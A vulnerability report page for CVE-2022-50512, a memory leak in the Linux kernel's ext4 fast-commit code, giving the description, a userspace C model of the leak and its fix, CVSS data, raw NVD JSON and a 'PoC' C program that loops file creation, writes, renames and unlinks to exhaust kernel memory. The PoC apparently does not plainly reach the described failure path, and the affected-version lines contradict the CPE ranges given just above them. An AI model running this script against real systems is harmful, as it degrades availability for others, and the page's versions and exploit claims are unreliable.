Security Vulnerability Report
CVE-2022-50512 CVSS 5.5 MEDIUM

CVE-2022-50512

Published: 2025-10-07 16:15:34
Last Modified: 2026-03-17 14:08:18
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ext4: fix potential memory leak in ext4_fc_record_regions()

As krealloc may return NULL, in this case 'state->fc_regions' may not be freed by krealloc, but 'state->fc_regions' is already set to NULL. This will then lead to a 'state->fc_regions' memory leak.
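The failure mode described above, shown as an added userspace C model (not the kernel's code and not the upstream patch): assigning the result of a failed realloc-style call straight back to the only pointer loses the old buffer, while a temporary pointer keeps it reachable for teardown. Every name except fc_regions is hypothetical, and a fault-injection switch stands in for krealloc returning NULL.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
/* Userspace model of the pattern; only fc_regions is a name from the page. */
struct region { int ino, lblk, pblk, len; };
struct replay_state { struct region *fc_regions; size_t size, used; };
static int fail_next, live_blocks; /* fault-injection switch; unfreed buffers */

/* Like krealloc/realloc: on failure return NULL, old block stays allocated. */
static void *model_realloc(void *old, size_t n) {
    if (fail_next) { fail_next = 0; return NULL; }
    void *p = realloc(old, n);
    live_blocks += (p && !old);
    return p;
}
/* Before: a failed grow overwrites the only pointer to the old buffer. */
static int record_leaky(struct replay_state *s, struct region r) {
    if (s->used == s->size) {
        s->size += 4;
        s->fc_regions = model_realloc(s->fc_regions, s->size * sizeof(r));
        if (!s->fc_regions) return -ENOMEM;
    }
    s->fc_regions[s->used++] = r;
    return 0;
}
/* After: pointer and size are committed only once the grow has succeeded. */
static int record_fixed(struct replay_state *s, struct region r) {
    if (s->used == s->size) {
        void *tmp = model_realloc(s->fc_regions, (s->size + 4) * sizeof(r));
        if (!tmp) return -ENOMEM;
        s->fc_regions = tmp;
        s->size += 4;
    }
    s->fc_regions[s->used++] = r;
    return 0;
}

/* Fill the first buffer, fail the grow, run teardown; return buffers leaked. */
int leaked_after_failed_grow(int use_fixed) {
    struct replay_state s = {0};
    struct region r = {1, 0, 100, 8}; /* constructed sample record */
    int before = live_blocks, err = 0;
    for (int i = 0; i < 5 && !err; i++) {
        fail_next = (i == 4); /* the fifth record needs a grow; make it fail */
        err = use_fixed ? record_fixed(&s, r) : record_leaky(&s, r);
    }
    if (s.fc_regions) { free(s.fc_regions); live_blocks--; } /* teardown */
    return live_blocks - before;
}
int main(void) { printf("leaky=%d fixed=%d\n", leaked_after_failed_grow(0), leaked_after_failed_grow(1)); return 0; }
```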

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.10, before 5.10.150) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.11, before 5.15.75) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.16, before 5.19.17) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.0, before 6.0.3) - VULNERABLE
Linux Kernel < 5.15.80
Linux Kernel 5.16.x < 5.16.16
Linux Kernel 5.17.x < 5.17.2
Linux Kernel 5.18.x < 5.18.1
Linux Kernel 5.10.x (LTS branch affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/* CVE-2022-50512 - Linux Kernel ext4 Memory Leak PoC
 * This PoC demonstrates how to trigger memory leak in ext4_fc_record_regions()
 * by repeatedly performing fast commit operations on ext4 filesystem.
 *
 * Note: Requires an ext4 filesystem mounted with fast_commit support.
 * Compile: gcc -o poc poc.c
 * Usage: ./poc /path/to/ext4/mountpoint
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <dirent.h>
#include <errno.h>
#include <signal.h>
#include <time.h>

#define NUM_FILES 10000
#define FILE_SIZE 4096
#define MOUNT_POINT "/mnt/ext4_test"

static volatile int running = 1;

void signal_handler(int sig)
{
    printf("\n[*] Caught signal %d, stopping...\n", sig);
    running = 0;
}

int create_and_modify_files(const char *path)
{
    char filepath[512];
    char buffer[FILE_SIZE];
    int fd;
    int i;

    memset(buffer, 'A', FILE_SIZE);

    for (i = 0; i < NUM_FILES && running; i++) {
        snprintf(filepath, sizeof(filepath), "%s/leak_file_%d.tmp", path, i);

        /* Create file - triggers ext4 fast commit region recording */
        fd = open(filepath, O_CREAT | O_WRONLY | O_TRUNC, 0644);
        if (fd < 0) {
            fprintf(stderr, "[-] Failed to create %s: %s\n", filepath, strerror(errno));
            continue;
        }

        /* Write data to trigger journal/fast-commit operations */
        if (write(fd, buffer, FILE_SIZE) != FILE_SIZE) {
            fprintf(stderr, "[-] Write failed: %s\n", strerror(errno));
        }

        /* Modify file to trigger more region recording */
        lseek(fd, 0, SEEK_SET);
        write(fd, buffer, FILE_SIZE / 2);
        close(fd);

        /* Rename to trigger more fast commit operations */
        char newpath[512];
        snprintf(newpath, sizeof(newpath), "%s/leak_file_%d.dat", path, i);
        rename(filepath, newpath);

        /* Unlink to add more regions to fast commit */
        unlink(newpath);
    }
    return 0;
}

int main(int argc, char *argv[])
{
    const char *mount_point;
    struct timespec start, now;
    long elapsed;

    if (argc < 2) {
        mount_point = MOUNT_POINT;
    } else {
        mount_point = argv[1];
    }

    printf("[*] CVE-2022-50512 ext4 Memory Leak PoC\n");
    printf("[*] Target mount point: %s\n", mount_point);

    /* Verify the mount point exists and is writable */
    if (access(mount_point, W_OK) != 0) {
        fprintf(stderr, "[-] Cannot write to %s: %s\n", mount_point, strerror(errno));
        fprintf(stderr, "[-] Please ensure %s is an ext4 mount with fast_commit\n", mount_point);
        return 1;
    }

    signal(SIGINT, signal_handler);
    signal(SIGTERM, signal_handler);

    clock_gettime(CLOCK_MONOTONIC, &start);

    printf("[*] Starting memory leak trigger...\n");
    printf("[*] Press Ctrl+C to stop\n\n");

    while (running) {
        create_and_modify_files(mount_point);
        clock_gettime(CLOCK_MONOTONIC, &now);
        elapsed = (now.tv_sec - start.tv_sec);
        if (elapsed > 0 && elapsed % 10 == 0) {
            printf("[*] Running for %ld seconds...\n", elapsed);
        }
    }

    printf("[*] Done. Check kernel memory usage with 'dmesg' or 'slabtop'\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50512", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:34.473", "lastModified": "2026-03-17T14:08:18.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix potential memory leak in ext4_fc_record_regions()\n\nAs krealloc may return NULL, in this case 'state->fc_regions' may not be\nfreed by krealloc, but 'state->fc_regions' already set NULL. Then will\nlead to 'state->fc_regions' memory leak."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10", "versionEndExcluding": "5.10.150", "matchCriteriaId": "0CF7C831-3BE2-41A1-A518-A1E4AEBC5669"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.75", "matchCriteriaId": "6D945F46-F32F-4C09-8400-C3477E22A9FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.17", "matchCriteriaId": "19B4C3A4-E5C3-41DC-BB14-BE72858E7D35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2cfb769d60a2a57eb3566765428b6131cd16dcfe", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/417b0455a0b6d0f60a2930592731d1f8340e24be", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/518566e71ad86b7c2f1bf6d9caee9588bb7ac158", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7069d105c1f15c442b68af43f7fde784f3126739", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a4058b869e6c5e517c79e30532a350d0f3115c3e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}